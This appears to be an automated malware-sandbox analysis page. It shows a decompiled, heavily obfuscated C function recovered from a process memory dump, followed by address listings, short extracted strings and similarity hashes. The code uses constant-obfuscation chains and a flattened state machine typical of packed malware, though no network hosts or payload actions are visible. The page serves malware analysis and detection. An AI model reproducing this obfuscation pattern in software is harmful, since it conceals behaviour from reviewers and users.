String ID: $($*h$,Tj$1cV$4T$;r$@H$CM<$J-$M49$Nu$R$TqV$qDC$yI$~A
API String ID: 0-1702946932
Opcode ID: 94e6ba3a022b80093e0eafa2a894e80c321c47c9aa93f6ae8d49fb6b6163a1f0
Instruction ID: 0879416366e34d841d5bd8874c7b942b2543c658b82c116a3f7ee3f89def5e9b
Opcode Fuzzy Hash: 94e6ba3a022b80093e0eafa2a894e80c321c47c9aa93f6ae8d49fb6b6163a1f0
Instruction Fuzzy Hash: CE82EF715093818FD3B8CF65C58AB8BFBE1BBC4708F10891DE1DA96260DBB59949CF42

Uniqueness

Uniqueness Score: -1.00%

Function 00BBC69B, Relevance: 20.7, Strings: 16, Instructions: 715
COMMONCrypto

Download Yara Rule

C-Code - Quality: 91%

			E00BBC69B(intOrPtr* __ecx) {
				char _v68;
				char _v76;
				void* _v88;
				intOrPtr _v92;
				intOrPtr* _v96;
				char _v100;
				char _v104;
				char _v108;
				char _v112;
				char _v116;
				signed int _v120;
				signed int _v124;
				signed int _v128;
				signed int _v132;
				signed int _v136;
				signed int _v140;
				signed int _v144;
				signed int _v148;
				signed int _v152;
				signed int _v156;
				signed int _v160;
				signed int _v164;
				signed int _v168;
				signed int _v172;
				signed int _v176;
				signed int _v180;
				signed int _v184;
				signed int _v188;
				signed int _v192;
				signed int _v196;
				signed int _v200;
				signed int _v204;
				signed int _v208;
				signed int _v212;
				signed int _v216;
				signed int _v220;
				signed int _v224;
				signed int _v228;
				signed int _v232;
				signed int _v236;
				signed int _v240;
				signed int _v244;
				signed int _v248;
				signed int _v252;
				signed int _v256;
				signed int _v260;
				signed int _v264;
				signed int _v268;
				signed int _v272;
				signed int _v276;
				signed int _v280;
				signed int _v284;
				signed int _v288;
				signed int _v292;
				signed int _v296;
				signed int _v300;
				signed int _v304;
				signed int _v308;
				signed int _v312;
				signed int _v316;
				signed int _v320;
				signed int _v324;
				signed int _v328;
				signed int _v332;
				signed int _v336;
				signed int _v340;
				signed int _v344;
				signed int _v348;
				signed int _v352;
				signed int _v356;
				signed int _v360;
				signed int _v364;
				signed int _v368;
				signed int _v372;
				signed int _v376;
				signed int _v380;
				signed int _v384;
				signed int _v388;
				signed int _v392;
				signed int _v396;
				signed int _v400;
				signed int _v404;
				signed int _v408;
				signed int _v412;
				signed int _v416;
				signed int _v420;
				void* _t802;
				void* _t804;
				void* _t806;
				void* _t813;
				void* _t815;
				void* _t824;
				void* _t825;
				void* _t826;
				void* _t834;
				signed int _t840;
				signed int _t841;
				signed int _t842;
				signed int _t843;
				signed int _t844;
				signed int _t845;
				signed int _t846;
				signed int _t847;
				signed int _t848;
				signed int _t849;
				signed int _t850;
				signed int _t851;
				signed int _t852;
				signed int _t853;
				signed int _t854;
				signed int _t855;
				signed int _t856;
				signed int _t857;
				signed int _t858;
				signed int _t859;
				signed int _t860;
				signed int _t861;
				void* _t862;
				char _t876;
				void* _t895;
				void* _t970;
				signed int _t973;
				void* _t974;
				signed int _t976;
				void* _t977;
				void* _t981;
				signed int* _t982;
				void* _t985;

				_t982 =  &_v420;
				_v92 = 0x21aaea;
				_v96 = __ecx;
				asm("stosd");
				_t840 = 0x27;
				asm("stosd");
				_t981 = 0;
				_t834 = 0x28b91dd;
				asm("stosd");
				_v276 = 0xea4201;
				_v276 = _v276 / _t840;
				_v276 = _v276 >> 9;
				_v276 = _v276 ^ 0x00000300;
				_v216 = 0x33fbfd;
				_v216 = _v216 + 0xffff15bd;
				_v216 = _v216 ^ 0x003311ba;
				_v348 = 0x23ac56;
				_t841 = 7;
				_v348 = _v348 * 0x70;
				_v348 = _v348 >> 0xa;
				_v348 = _v348 << 5;
				_v348 = _v348 ^ 0x007cdb20;
				_v152 = 0xc392ed;
				_v152 = _v152 | 0x3cac8e62;
				_v152 = _v152 ^ 0x3cef9eef;
				_v120 = 0xdb52e;
				_v120 = _v120 | 0x021edf72;
				_v120 = _v120 ^ 0x021fff7e;
				_v140 = 0x716289;
				_v140 = _v140 / _t841;
				_v140 = _v140 ^ 0x001032a5;
				_v404 = 0x901eee;
				_v404 = _v404 | 0xb1deeda2;
				_v404 = _v404 << 0x10;
				_t842 = 0x18;
				_v404 = _v404 * 0x76;
				_v404 = _v404 ^ 0xf7b40000;
				_v308 = 0x6641fd;
				_v308 = _v308 << 8;
				_v308 = _v308 >> 0xb;
				_v308 = _v308 ^ 0x000cc83f;
				_v220 = 0xec4b39;
				_t65 =  &_v220; // 0xec4b39
				_v220 =  *_t65 * 0x63;
				_v220 = _v220 ^ 0x5b61170b;
				_v336 = 0x6361c6;
				_v336 = _v336 | 0x3c2b95f6;
				_v336 = _v336 << 6;
				_v336 = _v336 ^ 0xaef3ea0d;
				_v336 = _v336 ^ 0xb40e978d;
				_v196 = 0x15a25f;
				_v196 = _v196 * 0x3e;
				_v196 = _v196 ^ 0x053d5302;
				_v244 = 0xaeb8cf;
				_v244 = _v244 ^ 0x8ffcaaa2;
				_v244 = _v244 + 0xffff121b;
				_v244 = _v244 ^ 0x8f512488;
				_v284 = 0x3cdf2a;
				_v284 = _v284 / _t842;
				_t843 = 0x6f;
				_v284 = _v284 / _t843;
				_v284 = _v284 ^ 0x00028d29;
				_v380 = 0xe8bf5b;
				_v380 = _v380 | 0xa79448e5;
				_v380 = _v380 + 0x3298;
				_t844 = 0x61;
				_v380 = _v380 / _t844;
				_v380 = _v380 ^ 0x01b6f871;
				_v164 = 0xa028e3;
				_v164 = _v164 >> 8;
				_v164 = _v164 ^ 0x000bef7a;
				_v144 = 0xaa000b;
				_v144 = _v144 | 0xb15b5655;
				_v144 = _v144 ^ 0xb1f93ed7;
				_v224 = 0x825ce8;
				_v224 = _v224 ^ 0x99839705;
				_v224 = _v224 ^ 0x990bf034;
				_v232 = 0x9a02a1;
				_v232 = _v232 ^ 0x3230df48;
				_v232 = _v232 ^ 0x32abc77a;
				_v372 = 0xe8db0;
				_v372 = _v372 ^ 0xdf502c0f;
				_v372 = _v372 << 4;
				_v372 = _v372 + 0xa166;
				_v372 = _v372 ^ 0xf5e20524;
				_v236 = 0xf17d89;
				_v236 = _v236 << 0xa;
				_v236 = _v236 ^ 0xc5fdd8cb;
				_v192 = 0x124401;
				_v192 = _v192 << 1;
				_v192 = _v192 ^ 0x002403ab;
				_v200 = 0x5fb430;
				_v200 = _v200 ^ 0xc7981bfe;
				_v200 = _v200 ^ 0xc7ca3d42;
				_v208 = 0xc74c13;
				_t845 = 0x57;
				_v208 = _v208 / _t845;
				_v208 = _v208 ^ 0x0006a8aa;
				_v168 = 0x8380fc;
				_v168 = _v168 * 0x53;
				_v168 = _v168 ^ 0x2aae8785;
				_v176 = 0x9ffdb9;
				_v176 = _v176 ^ 0xfc54cce6;
				_v176 = _v176 ^ 0xfccfce01;
				_v184 = 0x3c19aa;
				_v184 = _v184 + 0xffff0dbd;
				_v184 = _v184 ^ 0x003c7cd6;
				_v332 = 0x7ddf6a;
				_v332 = _v332 * 0x48;
				_v332 = _v332 + 0xffffc784;
				_v332 = _v332 >> 2;
				_v332 = _v332 ^ 0x08d6f5e9;
				_v260 = 0x768b26;
				_v260 = _v260 + 0x1ea0;
				_v260 = _v260 >> 0xa;
				_v260 = _v260 ^ 0x00091d68;
				_v340 = 0xf041ab;
				_v340 = _v340 | 0x9a3ffa69;
				_v340 = _v340 * 0x76;
				_v340 = _v340 << 2;
				_v340 = _v340 ^ 0xc7fb4a22;
				_v356 = 0x43b3d6;
				_v356 = _v356 + 0x4b8b;
				_v356 = _v356 + 0xe9f;
				_v356 = _v356 >> 3;
				_v356 = _v356 ^ 0x000654db;
				_v296 = 0x3744a4;
				_v296 = _v296 | 0xb4c0bda8;
				_v296 = _v296 << 0xc;
				_v296 = _v296 ^ 0x7fd1bf6e;
				_v240 = 0xf0a4a1;
				_t846 = 0x35;
				_t973 = 0x29;
				_v240 = _v240 * 0x29;
				_v240 = _v240 ^ 0x268dfba5;
				_v204 = 0x963c75;
				_v204 = _v204 * 0x65;
				_v204 = _v204 ^ 0x3b49a4c9;
				_v248 = 0xe9b3e2;
				_v248 = _v248 + 0xffffcfe1;
				_v248 = _v248 + 0xffff3918;
				_v248 = _v248 ^ 0x00edd730;
				_v320 = 0x14b129;
				_v320 = _v320 | 0x7afa9cce;
				_v320 = _v320 << 6;
				_v320 = _v320 * 0x2c;
				_v320 = _v320 ^ 0xf22961a1;
				_v412 = 0xf4420e;
				_v412 = _v412 * 0x78;
				_v412 = _v412 >> 5;
				_v412 = _v412 + 0x6896;
				_v412 = _v412 ^ 0x039e325f;
				_v420 = 0x97c268;
				_v420 = _v420 >> 7;
				_v420 = _v420 + 0x9a22;
				_v420 = _v420 * 5;
				_v420 = _v420 ^ 0x0006f3f8;
				_v368 = 0xfa90cd;
				_v368 = _v368 >> 3;
				_v368 = _v368 | 0x960f0bdf;
				_v368 = _v368 / _t846;
				_v368 = _v368 ^ 0x02d25408;
				_v344 = 0xc4a2c6;
				_v344 = _v344 / _t973;
				_t847 = 0x6d;
				_v344 = _v344 * 0x41;
				_v344 = _v344 / _t847;
				_v344 = _v344 ^ 0x0000e167;
				_v376 = 0xa5ec95;
				_v376 = _v376 + 0xffff9374;
				_v376 = _v376 + 0x40c1;
				_v376 = _v376 << 5;
				_v376 = _v376 ^ 0x14ba2e6c;
				_v124 = 0xd2fda4;
				_v124 = _v124 + 0xe683;
				_v124 = _v124 ^ 0x00d1ecea;
				_v188 = 0x3a4eac;
				_v188 = _v188 * 0x65;
				_v188 = _v188 ^ 0x170628e3;
				_v132 = 0x698490;
				_v132 = _v132 + 0x597e;
				_v132 = _v132 ^ 0x0066fb45;
				_v292 = 0x223a77;
				_v292 = _v292 << 0xd;
				_v292 = _v292 + 0xffff3c10;
				_v292 = _v292 ^ 0x474a06e9;
				_v180 = 0x302f0e;
				_v180 = _v180 >> 5;
				_v180 = _v180 ^ 0x000a5e5d;
				_v300 = 0xc22ee2;
				_v300 = _v300 << 9;
				_v300 = _v300 ^ 0x161ea530;
				_v300 = _v300 ^ 0x924eaf38;
				_v172 = 0xfb4aa2;
				_t848 = 0x5b;
				_v172 = _v172 / _t848;
				_v172 = _v172 ^ 0x000048eb;
				_v388 = 0x360efc;
				_t849 = 0xa;
				_v388 = _v388 * 0x3a;
				_v388 = _v388 + 0xc1c4;
				_v388 = _v388 + 0x5664;
				_v388 = _v388 ^ 0x0c403f0e;
				_v396 = 0x5476a;
				_v396 = _v396 ^ 0x42600bf2;
				_v396 = _v396 >> 0xe;
				_v396 = _v396 * 0x62;
				_v396 = _v396 ^ 0x00664365;
				_v328 = 0xe3494b;
				_v328 = _v328 + 0x92aa;
				_v328 = _v328 ^ 0x6aed616f;
				_t376 =  &_v328; // 0x6aed616f
				_v328 =  *_t376 / _t849;
				_v328 = _v328 ^ 0x0a9641d7;
				_v268 = 0xcdefc7;
				_v268 = _v268 ^ 0xa3334e4e;
				_t850 = 0x25;
				_v268 = _v268 / _t850;
				_v268 = _v268 ^ 0x04647efb;
				_v400 = 0x131a5;
				_t851 = 0x64;
				_v400 = _v400 * 0x4a;
				_v400 = _v400 ^ 0x0f1274da;
				_v400 = _v400 * 0x22;
				_v400 = _v400 ^ 0x07d5f55f;
				_v360 = 0xe617d1;
				_v360 = _v360 >> 0xd;
				_v360 = _v360 | 0x5174fa74;
				_v360 = _v360 + 0x188;
				_v360 = _v360 ^ 0x517a384b;
				_v128 = 0xe00f23;
				_v128 = _v128 << 0xa;
				_v128 = _v128 ^ 0x8036c474;
				_v408 = 0xcb78c3;
				_v408 = _v408 / _t851;
				_t852 = 0x47;
				_v408 = _v408 / _t852;
				_v408 = _v408 + 0xffff68fe;
				_v408 = _v408 ^ 0xfff44118;
				_v272 = 0xfc5a62;
				_v272 = _v272 * 0x34;
				_v272 = _v272 >> 5;
				_v272 = _v272 ^ 0x019747a7;
				_v156 = 0xfa4dde;
				_v156 = _v156 >> 8;
				_v156 = _v156 ^ 0x000644ae;
				_v304 = 0x2315e0;
				_v304 = _v304 ^ 0x963b0ec5;
				_t853 = 0x11;
				_v304 = _v304 / _t853;
				_v304 = _v304 ^ 0x08dc5d77;
				_v392 = 0x627a1b;
				_t854 = 0x75;
				_v392 = _v392 / _t854;
				_v392 = _v392 << 0xc;
				_t976 = 0x2a;
				_v392 = _v392 / _t976;
				_v392 = _v392 ^ 0x0054cd8e;
				_v148 = 0x2962f6;
				_v148 = _v148 << 0xe;
				_v148 = _v148 ^ 0x58b06ca9;
				_v212 = 0x9d6abd;
				_v212 = _v212 + 0xffff6fa8;
				_v212 = _v212 ^ 0x009f4a76;
				_v416 = 0xfea0f4;
				_t855 = 0x2d;
				_v416 = _v416 / _t855;
				_v416 = _v416 / _t973;
				_v416 = _v416 + 0x55e0;
				_v416 = _v416 ^ 0x0005c112;
				_v228 = 0x3963a4;
				_v228 = _v228 ^ 0x31d128c3;
				_v228 = _v228 ^ 0x31eeea44;
				_v136 = 0x9230b0;
				_v136 = _v136 + 0xffff1ea6;
				_v136 = _v136 ^ 0x00954d5e;
				_v364 = 0x2249f0;
				_v364 = _v364 ^ 0xfb680cc4;
				_v364 = _v364 / _t976;
				_v364 = _v364 << 4;
				_v364 = _v364 ^ 0x5fb5fcae;
				_v160 = 0x56bde9;
				_v160 = _v160 << 0x10;
				_v160 = _v160 ^ 0xbde8ac4a;
				_v312 = 0x1ceb4a;
				_v312 = _v312 | 0x930b0a1e;
				_v312 = _v312 + 0x4259;
				_v312 = _v312 ^ 0x93207f8d;
				_v280 = 0x43d239;
				_v280 = _v280 >> 0xb;
				_v280 = _v280 + 0xffff7066;
				_v280 = _v280 ^ 0xfff11c5c;
				_v264 = 0xa9b19b;
				_v264 = _v264 + 0xffffea48;
				_v264 = _v264 ^ 0xb4acc61c;
				_v264 = _v264 ^ 0xb407c15c;
				_v288 = 0x20bbe8;
				_v288 = _v288 + 0xffffa4f3;
				_v288 = _v288 + 0xeeb1;
				_v288 = _v288 ^ 0x002a2e89;
				_v384 = 0x678812;
				_t856 = 0x60;
				_v384 = _v384 / _t856;
				_v384 = _v384 ^ 0xc458a46c;
				_t974 = 0x4e52e2;
				_t977 = 0x8c2efc;
				_t857 = 0x74;
				_v384 = _v384 / _t857;
				_v384 = _v384 ^ 0x01b63bee;
				_v256 = 0xedc72;
				_t858 = 0x62;
				_v256 = _v256 / _t858;
				_v256 = _v256 >> 0xf;
				_v256 = _v256 ^ 0x000eb51d;
				_v352 = 0x77af38;
				_v352 = _v352 + 0xffff483b;
				_v352 = _v352 + 0xdbd8;
				_v352 = _v352 + 0xffff9e40;
				_v352 = _v352 ^ 0x007a82c2;
				_v316 = 0x34e014;
				_v316 = _v316 >> 0xb;
				_v316 = _v316 + 0xffff226a;
				_v316 = _v316 ^ 0x55756368;
				_v316 = _v316 ^ 0xaa84562e;
				_v324 = 0x2bc11f;
				_v324 = _v324 | 0x52ab72b8;
				_t859 = 0x58;
				_v324 = _v324 / _t859;
				_t860 = 0x5f;
				_v324 = _v324 / _t860;
				_v324 = _v324 ^ 0x00016621;
				_v252 = 0xf022e;
				_v252 = _v252 >> 8;
				_t861 = 0x3b;
				_v252 = _v252 / _t861;
				_v252 = _v252 ^ 0x000f04ac;
				while(1) {
					L1:
					_t802 = 0xd56de6a;
					while(1) {
						L2:
						_t862 = 0x80f0eae;
						do {
							while(1) {
								L3:
								_t985 = _t834 - 0x8ccb677;
								if(_t985 > 0) {
									break;
								}
								if(_t985 == 0) {
									E00BC8907(_v100, _v280, _v264, _v288);
									_t834 = _t974;
									while(1) {
										L1:
										_t802 = 0xd56de6a;
										L2:
										_t862 = 0x80f0eae;
										goto L3;
									}
								}
								if(_t834 == _t974) {
									E00BC8907(_v116, _v384, _v256, _v352);
									_t834 = 0xe9f0a5a;
									while(1) {
										L1:
										_t802 = 0xd56de6a;
										goto L2;
									}
								}
								if(_t834 == _t977) {
									_t824 = E00BCF561(_v104);
									_t834 = 0xac30134;
									__eflags = _t824;
									_t981 =  !=  ? 1 : _t981;
									while(1) {
										L1:
										_t802 = 0xd56de6a;
										goto L2;
									}
								}
								if(_t834 == 0x14ed6fb) {
									_t825 = E00BC132D(_v116, _v296, _v240, _v120, _v204);
									_t982 =  &(_t982[3]);
									__eflags = _t825 - _v140;
									_t802 = 0xd56de6a;
									_t834 =  ==  ? 0xd56de6a : _t974;
									goto L2;
								}
								if(_t834 == 0x15fae28) {
									_t826 = E00BD0AD3(_v328, _v268, __eflags);
									_t895 = 0xbb1598;
									__eflags = E00BBF7F4(_v400, _t826, _v360,  *_v96,  *((intOrPtr*)(_v96 + 4)), _t895, _v128, _v112,  &_v100, _v408, _v272, _v220, _v156, _v304) - _v336;
									_t834 =  ==  ? 0x80f0eae : _t974;
									E00BC2EED(_v392, _v148, _v212, _t826);
									_t982 =  &(_t982[0xe]);
									L14:
									_t977 = 0x8c2efc;
									L35:
									_t862 = 0x80f0eae;
									_t802 = 0xd56de6a;
									goto L36;
								}
								if(_t834 == 0x28b91dd) {
									_t834 = 0xbb5c550;
									continue;
								}
								if(_t834 != _t862) {
									goto L36;
								}
								E00BC3927(_v416, _v228, _v136, _v196,  &_v104, _v116, _v100);
								_t982 =  &(_t982[5]);
								_t834 =  ==  ? _t977 : 0x8ccb677;
								while(1) {
									L1:
									_t802 = 0xd56de6a;
									goto L2;
								}
							}
							__eflags = _t834 - 0x9b49f28;
							if(_t834 == 0x9b49f28) {
								_v108 = 0x100;
								_t804 = E00BC703F(_v332, _v260, _v340, 0x100,  &_v116, _v112, _v348, _v356);
								_t982 =  &(_t982[6]);
								__eflags = _t804 - _v152;
								if(__eflags != 0) {
									_t834 = 0xe9f0a5a;
									goto L35;
								}
								_t834 = 0x14ed6fb;
								while(1) {
									L1:
									_t802 = 0xd56de6a;
									goto L2;
								}
							}
							__eflags = _t834 - 0xac30134;
							if(_t834 == 0xac30134) {
								E00BB5FF7(_v364, _v160, _v312, _v104);
								_t834 = 0x8ccb677;
								goto L1;
							}
							__eflags = _t834 - 0xbb5c550;
							if(__eflags == 0) {
								_push(0xbb16d8);
								_t806 = E00BD0AD3(_v284, _v380, __eflags);
								 *_t982 = 0xbb15c8;
								__eflags = E00BB92DD(_t806, _v276, _v224,  &_v112, E00BD0AD3(_v164, _v144, __eflags), _v232, _v372, _v236) - _v216;
								_t834 =  ==  ? 0x9b49f28 : 0x911112e;
								E00BC2EED(_v192, _v200, _v208, _t806);
								E00BC2EED(_v168, _v176, _v184, _t807);
								_t982 =  &(_t982[0xa]);
								_t974 = 0x4e52e2;
								goto L14;
							}
							__eflags = _t834 - _t802;
							if(__eflags == 0) {
								_push(0xbb1598);
								_t813 = E00BD0AD3(_v248, _v320, __eflags);
								_t876 = 0x48;
								_t980 = _t813;
								_v108 = _t876;
								_t815 = E00BBAD17( &_v108, _v404, _t876, _v412,  &_v76, _v420, _t876, _v116, _v368, _v344, _v376, _t813, _v124, _v188);
								_t982 =  &(_t982[0xc]);
								__eflags = _t815 - _v308;
								if(_t815 != _v308) {
									_t834 = _t974;
								} else {
									_push(_v300);
									_push(_v180);
									_push(_v292);
									_push(_v132);
									_push( *0xbd5be0 + 0x18);
									_t970 = 0x40;
									E00BC4626( &_v68, _t970);
									_t982 =  &(_t982[5]);
									_t834 = 0x15fae28;
								}
								E00BC2EED(_v172, _v388, _v396, _t980);
								goto L14;
							}
							__eflags = _t834 - 0xe9f0a5a;
							if(_t834 != 0xe9f0a5a) {
								goto L36;
							}
							E00BB2CF9(_v316, _v324, _v244, _v252, _v112);
							L25:
							return _t981;
							L36:
							__eflags = _t834 - 0x911112e;
						} while (__eflags != 0);
						goto L25;
					}
				}
			}

0x00bbc69b
0x00bbc6a1
0x00bbc6b9
0x00bbc6c0
0x00bbc6c5
0x00bbc6c8
0x00bbc6c9
0x00bbc6cb
0x00bbc6d0
0x00bbc6d1
0x00bbc6e7
0x00bbc6ee
0x00bbc6f6
0x00bbc701
0x00bbc70c
0x00bbc717
0x00bbc722
0x00bbc72f
0x00bbc732
0x00bbc736
0x00bbc73b
0x00bbc740
0x00bbc748
0x00bbc753
0x00bbc75e
0x00bbc769
0x00bbc774
0x00bbc77f
0x00bbc78a
0x00bbc7a0
0x00bbc7a7
0x00bbc7b2
0x00bbc7ba
0x00bbc7c2
0x00bbc7cc
0x00bbc7cd
0x00bbc7d1
0x00bbc7d9
0x00bbc7e4
0x00bbc7ec
0x00bbc7f4
0x00bbc7ff
0x00bbc80a
0x00bbc812
0x00bbc819
0x00bbc824
0x00bbc82c
0x00bbc834
0x00bbc839
0x00bbc841
0x00bbc849
0x00bbc85c
0x00bbc863
0x00bbc86e
0x00bbc879
0x00bbc884
0x00bbc88f
0x00bbc89a
0x00bbc8b0
0x00bbc8c0
0x00bbc8c5
0x00bbc8ce
0x00bbc8d9
0x00bbc8e1
0x00bbc8e9
0x00bbc8f5
0x00bbc8fa
0x00bbc900
0x00bbc908
0x00bbc913
0x00bbc91b
0x00bbc926
0x00bbc931
0x00bbc93c
0x00bbc947
0x00bbc952
0x00bbc95d
0x00bbc968
0x00bbc973
0x00bbc97e
0x00bbc989
0x00bbc991
0x00bbc999
0x00bbc99e
0x00bbc9a6
0x00bbc9ae
0x00bbc9b9
0x00bbc9c1
0x00bbc9cc
0x00bbc9d7
0x00bbc9de
0x00bbc9e9
0x00bbc9f4
0x00bbc9ff
0x00bbca0a
0x00bbca1c
0x00bbca1f
0x00bbca26
0x00bbca31
0x00bbca44
0x00bbca4b
0x00bbca56
0x00bbca61
0x00bbca6c
0x00bbca77
0x00bbca82
0x00bbca8d
0x00bbca98
0x00bbcaa5
0x00bbcaa9
0x00bbcab1
0x00bbcab6
0x00bbcabe
0x00bbcac9
0x00bbcad4
0x00bbcadc
0x00bbcae7
0x00bbcaef
0x00bbcafc
0x00bbcb00
0x00bbcb05
0x00bbcb0d
0x00bbcb15
0x00bbcb1d
0x00bbcb25
0x00bbcb2a
0x00bbcb32
0x00bbcb3d
0x00bbcb4a
0x00bbcb52
0x00bbcb5d
0x00bbcb72
0x00bbcb75
0x00bbcb76
0x00bbcb7d
0x00bbcb88
0x00bbcb9d
0x00bbcba4
0x00bbcbaf
0x00bbcbba
0x00bbcbc5
0x00bbcbd0
0x00bbcbdb
0x00bbcbe3
0x00bbcbeb
0x00bbcbf5
0x00bbcbf9
0x00bbcc01
0x00bbcc0e
0x00bbcc12
0x00bbcc17
0x00bbcc1f
0x00bbcc27
0x00bbcc2f
0x00bbcc34
0x00bbcc41
0x00bbcc45
0x00bbcc4d
0x00bbcc55
0x00bbcc5a
0x00bbcc6a
0x00bbcc6e
0x00bbcc76
0x00bbcc86
0x00bbcc8f
0x00bbcc90
0x00bbcc9a
0x00bbcc9e
0x00bbcca6
0x00bbccae
0x00bbccb6
0x00bbccbe
0x00bbccc3
0x00bbcccb
0x00bbccd6
0x00bbcce1
0x00bbccec
0x00bbccff
0x00bbcd06
0x00bbcd11
0x00bbcd1c
0x00bbcd27
0x00bbcd32
0x00bbcd3d
0x00bbcd45
0x00bbcd50
0x00bbcd5b
0x00bbcd66
0x00bbcd6e
0x00bbcd79
0x00bbcd86
0x00bbcd8e
0x00bbcd99
0x00bbcda4
0x00bbcdb8
0x00bbcdbd
0x00bbcdc6
0x00bbcdd1
0x00bbcdde
0x00bbcde1
0x00bbcde5
0x00bbcded
0x00bbcdf5
0x00bbcdfd
0x00bbce05
0x00bbce0d
0x00bbce17
0x00bbce1b
0x00bbce23
0x00bbce2b
0x00bbce33
0x00bbce3b
0x00bbce43
0x00bbce47
0x00bbce4f
0x00bbce5a
0x00bbce6c
0x00bbce71
0x00bbce7a
0x00bbce85
0x00bbce92
0x00bbce95
0x00bbce99
0x00bbcea6
0x00bbceaa
0x00bbceb2
0x00bbceba
0x00bbcebf
0x00bbcec7
0x00bbcecf
0x00bbced7
0x00bbcee2
0x00bbceea
0x00bbcef5
0x00bbcf05
0x00bbcf0d
0x00bbcf10
0x00bbcf14
0x00bbcf1c
0x00bbcf24
0x00bbcf37
0x00bbcf3e
0x00bbcf46
0x00bbcf51
0x00bbcf5c
0x00bbcf64
0x00bbcf6f
0x00bbcf7c
0x00bbcf90
0x00bbcf95
0x00bbcf9c
0x00bbcfa7
0x00bbcfb5
0x00bbcfba
0x00bbcfbe
0x00bbcfc9
0x00bbcfce
0x00bbcfd2
0x00bbcfda
0x00bbcfe5
0x00bbcfed
0x00bbcff8
0x00bbd003
0x00bbd00e
0x00bbd019
0x00bbd027
0x00bbd02c
0x00bbd038
0x00bbd03c
0x00bbd044
0x00bbd04c
0x00bbd057
0x00bbd062
0x00bbd06d
0x00bbd078
0x00bbd083
0x00bbd08e
0x00bbd096
0x00bbd0a6
0x00bbd0aa
0x00bbd0af
0x00bbd0b7
0x00bbd0c2
0x00bbd0ca
0x00bbd0d5
0x00bbd0e0
0x00bbd0eb
0x00bbd0f6
0x00bbd101
0x00bbd10c
0x00bbd114
0x00bbd11f
0x00bbd12a
0x00bbd135
0x00bbd140
0x00bbd14b
0x00bbd156
0x00bbd161
0x00bbd16c
0x00bbd177
0x00bbd184
0x00bbd190
0x00bbd195
0x00bbd19b
0x00bbd1a3
0x00bbd1ac
0x00bbd1b1
0x00bbd1b6
0x00bbd1bc
0x00bbd1c4
0x00bbd1d6
0x00bbd1db
0x00bbd1e4
0x00bbd1ec
0x00bbd1f7
0x00bbd1ff
0x00bbd207
0x00bbd20f
0x00bbd217
0x00bbd21f
0x00bbd227
0x00bbd22c
0x00bbd234
0x00bbd23c
0x00bbd244
0x00bbd24c
0x00bbd258
0x00bbd25d
0x00bbd267
0x00bbd26c
0x00bbd272
0x00bbd27a
0x00bbd285
0x00bbd294
0x00bbd297
0x00bbd29e
0x00bbd2a9
0x00bbd2a9
0x00bbd2a9
0x00bbd2ae
0x00bbd2ae
0x00bbd2ae
0x00bbd2b3
0x00bbd2b3
0x00bbd2b3
0x00bbd2b3
0x00bbd2b9
0x00000000
0x00000000
0x00bbd2bf
0x00bbd48f
0x00bbd496
0x00bbd2a9
0x00bbd2a9
0x00bbd2a9
0x00bbd2ae
0x00bbd2ae
0x00000000
0x00bbd2ae
0x00bbd2a9
0x00bbd2c7
0x00bbd462
0x00bbd469
0x00bbd2a9
0x00bbd2a9
0x00bbd2a9
0x00000000
0x00bbd2a9
0x00bbd2a9
0x00bbd2cf
0x00bbd435
0x00bbd43c
0x00bbd442
0x00bbd444
0x00bbd2a9
0x00bbd2a9
0x00bbd2a9
0x00000000
0x00bbd2a9
0x00bbd2a9
0x00bbd2db
0x00bbd40e
0x00bbd41a
0x00bbd41d
0x00bbd421
0x00bbd426
0x00000000
0x00bbd426
0x00bbd2e7
0x00bbd359
0x00bbd35e
0x00bbd3bc
0x00bbd3d2
0x00bbd3d9
0x00bbd3de
0x00bbd3e1
0x00bbd3e1
0x00bbd715
0x00bbd715
0x00bbd71a
0x00000000
0x00bbd71a
0x00bbd2ef
0x00bbd33f
0x00000000
0x00bbd33f
0x00bbd2f3
0x00000000
0x00000000
0x00bbd328
0x00bbd32d
0x00bbd337
0x00bbd2a9
0x00bbd2a9
0x00bbd2a9
0x00000000
0x00bbd2a9
0x00bbd2a9
0x00bbd4a2
0x00bbd4a4
0x00bbd6c7
0x00bbd6f5
0x00bbd6fa
0x00bbd6fd
0x00bbd704
0x00bbd710
0x00000000
0x00bbd710
0x00bbd706
0x00bbd2a9
0x00bbd2a9
0x00bbd2a9
0x00000000
0x00bbd2a9
0x00bbd2a9
0x00bbd4aa
0x00bbd4b0
0x00bbd6ab
0x00bbd6b2
0x00000000
0x00bbd6b2
0x00bbd4b6
0x00bbd4bc
0x00bbd5e0
0x00bbd5e5
0x00bbd5fa
0x00bbd645
0x00bbd65b
0x00bbd665
0x00bbd680
0x00bbd685
0x00bbd688
0x00000000
0x00bbd688
0x00bbd4c2
0x00bbd4c4
0x00bbd512
0x00bbd517
0x00bbd51f
0x00bbd527
0x00bbd529
0x00bbd568
0x00bbd56d
0x00bbd570
0x00bbd577
0x00bbd5b7
0x00bbd579
0x00bbd579
0x00bbd587
0x00bbd58e
0x00bbd595
0x00bbd5a4
0x00bbd5a7
0x00bbd5a8
0x00bbd5ad
0x00bbd5b0
0x00bbd5b0
0x00bbd5c9
0x00000000
0x00bbd5cf
0x00bbd4c6
0x00bbd4cc
0x00000000
0x00000000
0x00bbd4f2
0x00bbd4fc
0x00bbd506
0x00bbd71f
0x00bbd71f
0x00bbd71f
0x00000000
0x00bbd72b
0x00bbd2ae

Strings

YB, xrefs: 00BBD0EB
hcuU, xrefs: 00BBD234
H, xrefs: 00BBCDC6
oaj, xrefs: 00BBCE3B
eCf, xrefs: 00BBCE1B
~Y, xrefs: 00BBCD1C
RN, xrefs: 00BBD688
U, xrefs: 00BBD03C
]^, xrefs: 00BBCD6E
dV, xrefs: 00BBCDED
D1, xrefs: 00BBD062
K8zQ, xrefs: 00BBCECF
RN, xrefs: 00BBD1A3
g, xrefs: 00BBCC9E
w:", xrefs: 00BBCD32
9K, xrefs: 00BBC80A

Memory Dump Source

Source File: 00000000.00000002.695194843.0000000000BB0000.00000040.00000010.sdmp, Offset: 00BB0000, based on PE: true

Yara matches

Similarity

API ID:
String ID: 9K$D1$K8zQ$YB$]^$dV$eCf$g$hcuU$oaj$w:"$~Y$H$RN$RN$U
API String ID: 0-3730166627
Opcode ID: 2a913dd93a816d07642e804e46e7b567a30091af917a1812b1eea381b2426a5e
Instruction ID: e069336fde0c437afd5dadcd7e59e1d84825df869a0a90e62eba95dd593d929d
Opcode Fuzzy Hash: 2a913dd93a816d07642e804e46e7b567a30091af917a1812b1eea381b2426a5e
Instruction Fuzzy Hash: DB82FD715083818FD378CF25C98AB9BBBE2FBC5304F10891DE69996260DBB59949CF43

Uniqueness

Uniqueness Score: -1.00%

